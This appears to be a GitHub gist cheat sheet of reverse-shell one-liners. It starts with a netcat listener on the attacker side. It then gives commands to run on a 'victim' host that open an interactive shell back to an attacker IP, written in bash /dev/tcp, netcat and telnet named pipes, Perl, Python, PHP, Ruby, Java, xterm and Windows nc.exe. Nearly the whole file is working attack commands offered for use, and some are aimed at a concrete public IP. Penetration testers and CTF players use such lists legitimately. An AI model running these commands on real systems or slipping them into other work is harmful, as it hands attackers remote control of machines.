Last active
September 13, 2024 16:01
-
-
Save alsunseri/8cfb94ec848691ba826c59473b363f41 to your computer and use it in GitHub Desktop.
nc netcat reverse shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On attack host in "local" active terminal using port 10000 for example: | |
| nc -l -t -v 8080 | |
| i.e. attacker$ nc -l -v [ATTACK_HOST_IP] 8080 | |
| Then On "remote" victim computer - run this command | |
| Get this to execute on the victim host ( assuming victim does not have netcat ) | |
| bash -i >& /dev/tcp/[ATTACK_HOST_IP]/10000 0>&1 | |
| for example: | |
| bash -i >& /dev/tcp/54.161.245.60/10000 0>&1 | |
| UNTESTED variation in comments on https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html | |
| simple nc variant with two connections: ( untested ? ) | |
| nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234 | |
| Netcat | |
| rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1 | |
| Telnet | |
| rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1 | |
| /bin/bash -i >& /dev/tcp/attackerip/4444 0>&1 | |
| Or for M$ windows: | |
| nc.exe 192.168.100.113 10000 –e cmd.exe | |
| As soon as that command is executed, you will have a remote shell on the "local" terminal window. | |
| Note: This will be CLEAR TEXT!! | |
| adopted and updated from | |
| https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ | |
| Other resources: | |
| https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html | |
| http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | |
| https://www.gnucitizen.org/blog/reverse-shell-with-bash/ | |
| http://pentestmonkey.net/tools/web-shells/perl-reverse-shell | |
| Bash adapted by pentestmonkey from https://www.gnucitizen.org/blog/reverse-shell-with-bash/ | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| small no-feature version of http://pentestmonkey.net/tools/web-shells/perl-reverse-shell | |
| perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | |
| Python | |
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | |
| PHP | |
| try fd 4,5,6 if fd 3 is the TCP connection is NOT using file descriptor 3. | |
| php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' | |
| Ruby | |
| ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | |
| NC Netcat ( i.e. AWS Linux 2 ) | |
| nc -e /bin/sh 10.0.0.1 1234 | |
| or try this next one from Jeff Price | |
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f | |
| i.e. | |
| mkfifo mypipe ; cat mypipe|/bin/bash|nc -l -p 6000 >mypipe | |
| Java untested | |
| r = Runtime.getRuntime() | |
| p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) | |
| p.waitFor() | |
| xterm | |
| xterm -bg black -fg white -display 10.0.0.1:1 | |
| To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). | |
| One way to do this is with Xnest (to be run on your system): | |
| Xnest :1 | |
| You’ll need to authorise the target to connect to you (command also run on your host): | |
| xhost +targetip | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment